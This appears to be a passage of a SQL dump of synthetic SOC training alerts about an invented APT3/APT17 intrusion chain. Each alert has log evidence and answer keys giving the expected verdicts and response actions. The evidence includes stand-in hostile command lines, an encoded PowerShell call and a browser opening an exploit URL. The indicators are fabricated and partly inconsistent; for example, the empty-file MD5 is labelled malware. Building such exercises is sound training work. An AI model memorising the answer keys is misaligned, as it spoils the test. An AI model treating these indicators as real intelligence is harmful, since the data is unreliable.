'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT17 C2 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3e23e8160039594a33894f6564e1b134\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to exfiltration malware used by APT17.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal host used during exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data marked for unauthorized 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:59:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:58:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:57:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"},{\"timestamp\":\"2026-02-08T18:56:02.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"DLP-Exfil-20231015-001\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"192.0.2.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3e23e8160039594a33894f6564e1b134\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"data_exfil.exe\\\",\\\"malicious_ip\\\":true,\\\"tags\\\":[\\\"APT17\\\",\\\"Exfiltration\\\",\\\"Critical\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1215, 'Suspicious Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email from APT3 was detected, containing a malicious link exploiting the CVE-2014-1776 vulnerability in Internet Explorer. The email was sent to a user within the network in an attempt to gain initial access.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:55:02Z\",\"email_id\":\"20231020-00123\",\"from\":\"attack@maliciousdomain.com\",\"to\":\"user@company.com\",\"subject\":\"Urgent: Update Your Account Information\",\"body\":\"Dear user, please update your account information using the following link: http://maliciousdomain.com/update\",\"attachments\":[],\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"malicious_link\":\"http://maliciousdomain.com/update\",\"exploit_cve\":\"CVE-2014-1776\"}', '2026-02-07 21:28:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DomainReputationService\",\"verdict\":\"malicious\",\"details\":\"Domain linked to multiple phishing attacks\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing content\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attack@maliciousdomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailReputationService\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing 
campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-02-08T19:00:02.538Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1216, 'Malicious Script Execution on User System', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script executed on the user system via a phishing email\'s link. The link triggers a script in Internet Explorer, exploiting a zero-day vulnerability to execute a payload, leading to potential system compromise.', 'Execution', 'T1203 Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_type\":\"malicious_script_execution\",\"host_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process\":{\"name\":\"iexplore.exe\",\"pid\":4587,\"command_line\":\"\\\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\\\" http://malicious-example.com/exploit\"},\"network\":{\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":80},\"file\":{\"name\":\"exploit_payload.js\",\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\exploit_payload.js\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"role\":\"attacker\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"role\":\"malicious_script\"}]}', '2026-02-07 21:28:29', '2026-02-19 15:53:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash linked to recent exploit scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 
0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1217, 'Pirpi Backdoor Installation', 'medium', 'File Integrity Monitoring', 'The File Integrity Monitoring system detected the installation of the Pirpi backdoor, which is known to be used by APT3 to maintain persistent access to compromised systems. The malware was installed after successful execution, allowing the attacker to establish a foothold within the network.', 'Persistence', 'T1546.006', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"event_id\":\"FIM-20231012-0001\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"C:\\\\Windows\\\\System32\\\\pirpi.dll\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"detected_event\":\"File Created\",\"action_taken\":\"Alerted\",\"description\":\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\"}', '2026-02-07 21:28:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP range\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT3 command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\pirpi.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Pirpi backdoor associated with APT3\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Pirpi malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"FIM-20231012-0001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi.dll\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"detected_event\\\":\\\"File 
Created\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"The file pirpi.dll was created in the System32 directory, associated with APT3 activity.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1218, 'Unauthorized Credential Access Detected', 'high', 'Network Traffic Analysis', 'APT3 utilizes the Pirpi backdoor to access and harvest user credentials. This activity is indicative of preparation for lateral movement within the network.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-07T14:23:45Z\",\"destination_ip\":\"10.0.5.15\",\"source_ip\":\"203.0.113.45\",\"protocol\":\"HTTP\",\"http_method\":\"POST\",\"url\":\"/login.php\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"username\":\"jdoe\",\"file_hash\":\"3fae2c2d4b0b5b5b7f6d8f2a2b7c8d9e\",\"filename\":\"pirpi_backdoor.exe\",\"http_status\":200}', '2026-02-07 21:28:29', '2026-02-19 15:51:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT3 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host suspected of compromise.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fae2c2d4b0b5b5b7f6d8f2a2b7c8d9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Pirpi backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account used in unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"pirpi_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File associated with APT3\'s Pirpi 
backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1219, 'Data Exfiltration Attempt Via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Systems', 'The final step in APT3\'s campaign attempts to exfiltrate sensitive data through encrypted channels, aiming to avoid detection. The attack was detected when a large volume of data was being sent from an internal server to an unfamiliar external IP address using HTTPS. The data transfer was flagged by DLP systems due to the encrypted channel and the large volume of data.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_id\":\"exfiltration_attempt_98765\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"198.51.100.25\",\"protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"filename\":\"confidential_data.zip\",\"user\":\"jdoe\",\"hash\":\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\",\"action\":\"blocked\",\"detection_method\":\"DLP\"}', '2026-02-07 21:28:29', '2026-02-19 15:53:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server attempting data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_network\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to tools used in data exfiltration activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"dlp_system\",\"verdict\":\"suspicious\",\"details\":\"File flagged by DLP due to large size and sensitive 
content.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:32Z\\\",\\\"event_id\\\":\\\"exfiltration_attempt_98765\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"198.51.100.25\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3d2e479b2f4e3f9a4c3b2e1d4f5a7b8c\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1220, 'Initial Access via Phishing Campaign', 'high', 'Email Gateway Logs', 'APT3 initiates a phishing campaign by sending spear-phishing emails containing links to a compromised website hosting the CVE-2015-3113 exploit. The campaign aims to deliver a malicious Adobe Flash exploit to the target organization.', 'Phishing', 'T1193', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_subject\":\"Urgent: Security Update Required\",\"sender_email\":\"security@update-alerts.com\",\"recipient_email\":\"john.doe@organization.com\",\"url\":\"http://compromised-site.com/flash-update\",\"attachment\":\"AdobeFlashUpdate.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_id\":\"message-id-123456789\",\"mime_type\":\"application/octet-stream\"}', '2026-02-07 21:28:52', '2026-02-19 15:50:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT3 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://compromised-site.com/flash-update\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Site hosts malicious content related to 